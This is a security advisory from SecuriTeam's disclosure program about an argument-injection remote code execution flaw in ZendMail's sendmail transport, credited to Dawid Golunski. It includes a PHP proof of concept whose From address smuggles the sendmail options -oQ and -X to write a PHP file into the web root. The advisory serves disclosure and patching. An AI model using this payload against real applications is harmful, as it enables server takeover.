SSD Advisory – ZendMail Remote Code Execution Vulnerability

January 23, 2017 admin SecuriTeam Secure Disclosure

Vulnerability Summary

The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker injecting additional parameters to the sendmail binary via the From address.

Credit
An independent security researcher Dawid Golunski (https://legalhackers.com/) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vulnerability Details

“ZendMail provides generalized functionality to compose and send both text and MIME-compliant multipart email messages. Mail can be sent with ZendMail via the MailTransportSendmail, MailTransportSmtp or the MailTransportFile transport. Of course, you can also implement your own transport by implementing the MailTransportTransportInterface.”

http://framework.zend.com/manual/current/en/modules/zend.mail.introduction.html

When using ZendMail class from ZendMail/Zend framework to send emails with MailTransportSendmail transport, a malicious user might be able to inject arbitrary parameters to sendmail program due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address.

Prof of Concept

 <?php    use ZendMail;  $mail = new MailMessage();  $mail->setBody(‘This is the text of the email.’);  $mail->setFrom(‘”AAA” -oQ/tmp -X/var/www/exploited.php BBB”@domain’, ‘Sender’s name’);  $mail->addTo(‘hacker@localhost’, ‘Name of recipient’);  $mail->setSubject(‘TestSubject’);    $transport = new MailTransportSendmail();    echo “gonna send…”;    $transport->send($mail);    ?>

will inject -oQ and -X parameters to sendmail command.

Vendor response

Release announcement can be found here: https://framework.zend.com/blog/2016-12-20-zf-2-4-11-released.html
Advisor can be found here: https://framework.zend.com/security/advisory/ZF2016-04

https://blogs.securiteam.com/index.php/feed